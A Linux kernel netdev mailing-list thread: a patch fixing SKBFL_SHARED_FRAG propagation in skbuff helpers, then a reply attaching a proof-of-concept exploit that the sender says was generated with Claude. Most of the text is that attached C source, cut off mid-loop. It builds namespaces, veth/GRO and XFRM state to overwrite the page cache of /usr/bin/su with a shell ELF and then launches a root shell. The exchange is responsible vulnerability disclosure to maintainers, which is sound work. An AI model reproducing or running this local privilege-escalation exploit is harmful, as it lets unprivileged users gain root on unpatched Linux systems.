* [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
@ 2026-05-13 21:07 Hyunwoo Kim
2026-05-14 6:18 ` Sultan Alsawaf
2026-05-14 8:04 ` Paolo Abeni
0 siblings, 2 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-13 21:07 UTC (permalink / raw)
To: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
dsahern
Cc: netdev, stable, imv4bel
Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
skb_shinfo()->flags when moving frags from source to destination.
__pskb_copy_fclone() defers the rest of the shinfo metadata to
skb_copy_header() after copying frag descriptors, but that helper
only carries over gso_{size,segs,type} and never touches
skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
descriptors directly and leave flags untouched. As a result, the
destination skb keeps a reference to the same externally-owned or
page-cache-backed pages while reporting skb_has_shared_frag() as
false.
The mismatch is harmful in any in-place writer that uses
skb_has_shared_frag() to decide whether shared pages must be detoured
through skb_cow_data(). ESP input is one such writer (esp4.c,
esp6.c), and a single nft 'dup to <local>' rule -- or any other
nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
skb in esp_input() with the marker stripped, letting an unprivileged
user write into the page cache of a root-owned read-only file via
authencesn-ESN stray writes.
Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
were actually moved from the source. skb_copy() and skb_copy_expand()
share skb_copy_header() too but linearize all paged data into freshly
allocated head storage and emerge with nr_frags == 0, so
skb_has_shared_frag() returns false on its own; they need no change.
Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
Reported-by: William Bowling <vakzz@zellic.io>
Reported-by: Hyunwoo Kim <imv4bel@gmail.com>
Cc: stable@vger.kernel.org
Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com>
---
Changes in v2:
- Also propagate SHARED_FRAG in skb_shift()
- v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
---
net/core/skbuff.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 7dad68e3b518..7cd388504297 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -2248,6 +2248,7 @@ struct sk_buff *__pskb_copy_fclone(struct sk_buff *skb, int headroom,
skb_frag_ref(skb, i);
}
skb_shinfo(n)->nr_frags = i;
+ skb_shinfo(n)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
}
if (skb_has_frag_list(skb)) {
@@ -4349,6 +4350,8 @@ int skb_shift(struct sk_buff *tgt, struct sk_buff *skb, int shiftlen)
tgt->ip_summed = CHECKSUM_PARTIAL;
skb->ip_summed = CHECKSUM_PARTIAL;
+ skb_shinfo(tgt)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
+
skb_len_add(skb, -shiftlen);
skb_len_add(tgt, shiftlen);
@@ -6200,6 +6203,8 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
from_shinfo->frags,
from_shinfo->nr_frags * sizeof(skb_frag_t));
to_shinfo->nr_frags += from_shinfo->nr_frags;
+ if (from_shinfo->nr_frags)
+ to_shinfo->flags |= from_shinfo->flags & SKBFL_SHARED_FRAG;
if (!skb_cloned(from))
from_shinfo->nr_frags = 0;
--
2.43.0
^ permalink raw reply related [flat|nested] 6+ messages in thread* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers 2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim @ 2026-05-14 6:18 ` Sultan Alsawaf 2026-05-14 9:23 ` Hyunwoo Kim 2026-05-14 8:04 ` Paolo Abeni 1 sibling, 1 reply; 6+ messages in thread From: Sultan Alsawaf @ 2026-05-14 6:18 UTC (permalink / raw) To: Hyunwoo Kim Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu, mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert, dsahern, netdev, stable [-- Attachment #1: Type: text/plain, Size: 852 bytes --] On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote: > Changes in v2: > - Also propagate SHARED_FRAG in skb_shift() > - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/ Hi Hyunwoo, I've been working on mitigating this vulnerability as a member of the kernel team at CIQ, a distro vendor. In particular, we wanted to make sure that there weren't any lingering places missing SHARED_FRAG propagation. To that end, I used Claude to discover that skb_gro_receive() remained unpatched (as you pointed out in the v1 thread). And then I generated a PoC exploiting the vulnerable skb_gro_receive() path. The PoC is a modified version of the original fragnesia PoC. It works 100% of the time, just like the original fragnesia PoC. I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a look at them. Thanks, Sultan [-- Attachment #2: fragnesia-gro.c --] [-- Type: text/plain, Size: 25061 bytes --] /* * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC * * Drop-in replacement for the espintcp fragnesia variant, targeting the same * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way * the original fragnesia does. * * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so * each ESP decrypt corrupts exactly ONE target byte with no collateral damage. * A precomputed IV table selects the AES-GCM keystream byte that XORs the * current file content to the desired shell_elf byte. * * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim. * * Build: * gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro * * Run (as root): * ./fragnesia-gro * * Exit codes: * 1: vulnerable (page cache mutated through GRO flag-strip path) * 0: fixed (byte unchanged) * 2: local setup or argument error * 4: namespace/veth gate closed */ #define _GNU_SOURCE #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <net/if.h> #include <netinet/in.h> #include <sched.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mount.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <time.h> #include <sys/wait.h> #include <unistd.h> #include <linux/bpf.h> #include <linux/if_addr.h> #include <linux/if_alg.h> #include <linux/netlink.h> #include <linux/xfrm.h> /* ---- compat defines ---- */ #ifndef NLA_ALIGNTO #define NLA_ALIGNTO 4 #endif #define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1)) #ifndef NLA_HDRLEN #define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr))) #endif #ifndef RTM_NEWLINK #define RTM_NEWLINK 16 #endif #ifndef RTM_NEWADDR #define RTM_NEWADDR 20 #endif #ifndef NETLINK_ROUTE #define NETLINK_ROUTE 0 #endif #ifndef NETLINK_XFRM #define NETLINK_XFRM 6 #endif #ifndef IFLA_IFNAME #define IFLA_IFNAME 3 #endif #ifndef IFLA_LINKINFO #define IFLA_LINKINFO 18 #endif #ifndef IFLA_INFO_KIND #define IFLA_INFO_KIND 1 #endif #ifndef IFLA_INFO_DATA #define IFLA_INFO_DATA 2 #endif #ifndef VETH_INFO_PEER #define VETH_INFO_PEER 1 #endif #ifndef IFLA_NET_NS_PID #define IFLA_NET_NS_PID 19 #endif #ifndef IFA_LOCAL #define IFA_LOCAL 2 #endif #ifndef IFA_ADDRESS #define IFA_ADDRESS 1 #endif #ifndef NLA_F_NESTED #define NLA_F_NESTED (1 << 15) #endif #ifndef ETHTOOL_SGRO #define ETHTOOL_SGRO 0x0000002c #endif #ifndef ETHTOOL_STSO #define ETHTOOL_STSO 0x0000001f #endif #ifndef ETHTOOL_SGSO #define ETHTOOL_SGSO 0x00000024 #endif #ifndef SIOCETHTOOL #define SIOCETHTOOL 0x8946 #endif #ifndef UDP_ENCAP #define UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #define UDP_ENCAP_ESPINUDP 2 #endif #ifndef UDP_GRO #define UDP_GRO 104 #endif #ifndef UDP_CORK #define UDP_CORK 1 #endif #ifndef AF_ALG #define AF_ALG 38 #endif #ifndef SOL_ALG #define SOL_ALG 279 #endif #ifndef ALG_SET_KEY #define ALG_SET_KEY 1 #endif #ifndef ALG_SET_OP #define ALG_SET_OP 3 #endif #ifndef ALG_OP_ENCRYPT #define ALG_OP_ENCRYPT 1 #endif #ifndef IFLA_XDP #define IFLA_XDP 43 #endif #ifndef IFLA_XDP_FD #define IFLA_XDP_FD 1 #endif #ifndef IFLA_XDP_FLAGS #define IFLA_XDP_FLAGS 3 #endif #ifndef XDP_FLAGS_SKB_MODE #define XDP_FLAGS_SKB_MODE (1U << 1) #endif struct rtnl_ifinfomsg { unsigned char ifi_family; unsigned char __ifi_pad; unsigned short ifi_type; int ifi_index; unsigned int ifi_flags; unsigned int ifi_change; }; /* ---- constants ---- */ #define VETH0 "veth0" #define VETH1 "veth1" #define ADDR_SRC "10.0.0.1" #define ADDR_DST "10.0.0.2" #define UDP_PORT 4500 #define ESP_SPI 0x100 #define ICV_LEN 16 #define PAYLOAD_LEN 192 /* * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted. */ #define SPLICE_LEN (1 + ICV_LEN) static const unsigned char xfrm_key[20] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04 }; static const uint8_t shell_elf[PAYLOAD_LEN] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, }; static const char *target_file = "/usr/bin/su"; /* ---- utility ---- */ static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); } static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); } static void store_be32(unsigned char *p, uint32_t v) { p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v; } static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); } static void sync_read(int fd) { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); } static unsigned char read_byte_at(int fd, off_t off) { unsigned char b; if (pread(fd, &b, 1, off) != 1) die("pread"); return b; } /* ---- netlink helpers ---- */ static int nl_ack_errno(char *buf, ssize_t len) { struct nlmsghdr *nlh; for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len); nlh = NLMSG_NEXT(nlh, len)) { if (nlh->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh); if (e->error == 0) return 0; errno = -e->error; return -1; } } errno = EPROTO; return -1; } static void add_nlattr(struct nlmsghdr *nlh, size_t max, unsigned short type, const void *data, size_t len) { size_t off = NLMSG_ALIGN(nlh->nlmsg_len); struct nlattr *nla = (struct nlattr *)((char *)nlh + off); if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } nla->nla_type = type; nla->nla_len = NLA_HDRLEN + len; memcpy((char *)nla + NLA_HDRLEN, data, len); nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len); } static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type) { size_t off = NLMSG_ALIGN(nlh->nlmsg_len); struct nlattr *nla = (struct nlattr *)((char *)nlh + off); if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } nla->nla_type = type; nla->nla_len = NLA_HDRLEN; nlh->nlmsg_len = off + NLA_HDRLEN; return nla; } static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla) { nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla); } static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label) { struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; char resp[4096]; int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto); if (fd < 0) gate_fail(label); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); memset(&sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); ssize_t r = recv(fd, resp, sizeof(resp), 0); if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label); close(fd); } /* ---- network setup ---- */ static void if_up(const char *name) { struct ifreq ifr = {}; int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (fd < 0) gate_fail("socket"); strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name); ifr.ifr_flags |= IFF_UP; if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name); close(fd); } static void create_veth(void) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1); struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED); add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5); struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED); struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED); { size_t o = NLMSG_ALIGN(nlh->nlmsg_len); memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); } add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1); nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li); nl_talk(nlh, NETLINK_ROUTE, "create veth"); } static void move_to_netns(const char *name, pid_t pid) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; uint32_t ns_pid = (uint32_t)pid; unsigned int idx = if_nametoindex(name); if (!idx) gate_fail("if_nametoindex"); nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid)); nl_talk(nlh, NETLINK_ROUTE, "move veth"); } static void add_addr(const char *name, const char *addr) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; struct in_addr a; unsigned int idx = if_nametoindex(name); if (!idx) gate_fail("if_nametoindex"); inet_pton(AF_INET, addr, &a); nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg)); nlh->nlmsg_type = RTM_NEWADDR; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh); ifa->ifa_family = AF_INET; ifa->ifa_prefixlen = 24; ifa->ifa_index = idx; add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a)); add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a)); nl_talk(nlh, NETLINK_ROUTE, "add addr"); } static void ethtool_set(const char *name, uint32_t cmd, uint32_t data) { struct ifreq ifr = {}; struct { uint32_t cmd; uint32_t data; } val = { cmd, data }; int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (fd < 0) return; strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); ifr.ifr_data = (void *)&val; ioctl(fd, SIOCETHTOOL, &ifr); close(fd); } /* ---- XDP attach/detach for NAPI init ---- */ static void xdp_toggle(const char *name, int prog_fd, uint32_t flags) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; unsigned int idx = if_nametoindex(name); if (!idx) return; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED); add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd)); add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags)); nest_end(nlh, x); nl_talk(nlh, NETLINK_ROUTE, "xdp"); } static void enable_veth_napi(const char *name) { struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; }; struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } }; struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l; uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {}; static const char lic[] = "GPL"; attr.t = 6; attr.c = 2; attr.i = (uint64_t)(unsigned long)prog; attr.l = (uint64_t)(unsigned long)lic; int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr)); if (fd < 0) return; xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE); close(fd); int m1 = -1; xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE); } /* ---- user namespace ---- */ static void setup_userns(void) { uid_t uid = getuid(); gid_t gid = getgid(); int rp[2], mp[2]; if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe"); pid_t c = fork(); if (c < 0) die("fork"); if (c == 0) { char path[64], map[64]; pid_t pp = getppid(); close(rp[1]); close(mp[0]); sync_read(rp[0]); snprintf(path, sizeof(path), "/proc/%d/setgroups", pp); int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); } snprintf(path, sizeof(path), "/proc/%d/uid_map", pp); snprintf(map, sizeof(map), "0 %u 1\n", uid); fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } snprintf(path, sizeof(path), "/proc/%d/gid_map", pp); snprintf(map, sizeof(map), "0 %u 1\n", gid); fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } sync_write(mp[1]); _exit(0); } close(rp[0]); close(mp[1]); if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)"); sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0); setresgid(0, 0, 0); setresuid(0, 0, 0); } /* ---- XFRM SA ---- */ static void add_sa(void) { char buf[4096] = {}; char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)]; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info)); nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); xs->sel.family = AF_INET; inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4); inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4); xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP; xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0; xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF; xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF; memset(ab, 0, sizeof(ab)); struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab; strcpy(a->alg_name, "rfc4106(gcm(aes))"); a->alg_key_len = sizeof(xfrm_key) * 8; a->alg_icv_len = ICV_LEN * 8; memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key)); add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab)); struct xfrm_encap_tmpl encap = {}; encap.encap_type = UDP_ENCAP_ESPINUDP; encap.encap_sport = htons(UDP_PORT); encap.encap_dport = htons(UDP_PORT); add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap)); nl_talk(nlh, NETLINK_XFRM, "add SA"); } /* ---- AES-GCM keystream ---- */ static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16]) { char cb[CMSG_SPACE(sizeof(uint32_t))] = {}; struct iovec iov = { (void *)in, 16 }; struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) }; uint32_t op = ALG_OP_ENCRYPT; struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP; cm->cmsg_len = CMSG_LEN(sizeof(op)); memcpy(CMSG_DATA(cm), &op, sizeof(op)); int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC); if (ofd < 0) die("AF_ALG accept"); if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send"); if (read(ofd, out, 16) != 16) die("AF_ALG read"); close(ofd); } /* * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM * ciphertext starts at frag byte 0. The target byte is at CTR position 0. */ #define KS_POS 0 static uint16_t stream_nonce[256]; static bool stream_have[256]; static void build_stream_table(void) { struct sockaddr_alg sa = { .salg_family = AF_ALG }; strcpy((char *)sa.salg_type, "skcipher"); strcpy((char *)sa.salg_name, "ecb(aes)"); int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0); if (fd < 0) die("AF_ALG"); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind"); if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key"); unsigned int count = 0; for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) { unsigned char iv[8], cb[16], out[16]; memset(iv, 0xcc, sizeof(iv)); store_be32(iv + 4, nonce); memcpy(cb, &xfrm_key[16], 4); memcpy(cb + 4, iv, 8); store_be32(cb + 12, 2 + KS_POS / 16); aes_ecb_block(fd, cb, out); unsigned char b = out[KS_POS % 16]; if (stream_have[b]) continue; stream_have[b] = true; stream_nonce[b] = (uint16_t)nonce; count++; } close(fd); if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); } } /* ---- main ---- */ int main(void) { setvbuf(stdout, NULL, _IONBF, 0); printf("[*] uid=%d euid=%d gid=%d egid=%d\n", getuid(), geteuid(), getgid(), getegid()); printf("[*] mode=gro_espinudp_pagecache_replace\n\n"); struct stat st; if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN) die("stat target"); printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size); build_stream_table(); printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS); /* * Fork before entering the user namespace. The child enters the * user/net namespace and does all the page-cache corruption. The * parent stays in the init user namespace so that execve() of the * corrupted setuid su binary honors the setuid bit, giving a real * root shell rather than a fake namespace-root shell. */ fflush(stdout); fflush(stderr); pid_t worker = fork(); if (worker < 0) die("fork worker"); if (worker > 0) { int wstatus; waitpid(worker, &wstatus, 0); if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) { char *argv[] = { (char *)target_file, NULL }; char *envp[] = { NULL }; execve(target_file, argv, envp); } return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2; } /* Child: enter user namespace and do the corruption */ if (getuid() != 0) setup_userns(); if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); if_up("lo"); create_veth(); int p_ns[2], p_veth[2], p_rdy[2]; if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe"); fflush(stdout); fflush(stderr); pid_t rx = fork(); if (rx < 0) die("fork"); if (rx == 0) { close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]); if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)"); mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL); mount("sysfs", "/sys", "sysfs", 0, NULL); sync_write(p_ns[1]); close(p_ns[1]); sync_read(p_veth[0]); close(p_veth[0]); if_up("lo"); ethtool_set(VETH1, ETHTOOL_SGRO, 1); if_up(VETH1); enable_veth_napi(VETH1); add_addr(VETH1, ADDR_DST); add_sa(); int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (ufd < 0) gate_fail("socket"); struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; inet_pton(AF_INET, ADDR_DST, &ba.sin_addr); if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind"); int et = UDP_ENCAP_ESPINUDP, gro = 1; setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et)); setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro)); sync_write(p_rdy[1]); pause(); _exit(0); } close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]); sync_read(p_ns[0]); close(p_ns[0]); move_to_netns(VETH1, rx); sync_write(p_veth[1]); close(p_veth[1]); if_up(VETH0); add_addr(VETH0, ADDR_SRC); ethtool_set(VETH0, ETHTOOL_STSO, 0); ethtool_set(VETH0, ETHTOOL_SGSO, 0); /* * Add a netem delay on the sender veth so both datagrams sit in the * qdisc until the timer fires, then get released into veth_xmit() * within the same softirq context. This guarantees both land in one * NAPI poll cycle for GRO to merge them, without needing sysfs * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the * init namespace). tc uses netlink with ns_capable(), so it works * from a user namespace. */ if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0) gate_fail("tc netem"); usleep(50000); sync_read(p_rdy[0]); close(p_rdy[0]); int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (sock < 0) die("socket"); struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr); inet_pton(AF_INET, ADDR_DST, &da.sin_addr); bind(sock, (struct sockaddr *)&sa, sizeof(sa)); connect(sock, (struct sockaddr *)&da, sizeof(da)); int target_fd = open(target_file, O_RDONLY | O_CLOEXEC); if (target_fd < 0) die("open target"); uint32_t seq = 1; size_t total_changed = 0; int delay_ms = 20; int sleep_us = 40000; struct timespec last_ok; clock_gettime(CLOCK_MONOTONIC, &last_ok); printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN); /* Warmup: send a dummy pair to prime the netem/NAPI path */ { unsigned char w[16 + SPLICE_LEN]; memset(w, 0, sizeof(w)); store_be32(w, ESP_SPI); store_be32(w + 4, seq++); send(sock, w, sizeof(w), 0); store_be32(w + 4, seq++); send(sock, w, sizeof(w), 0); usleep(sleep_us); } for (int 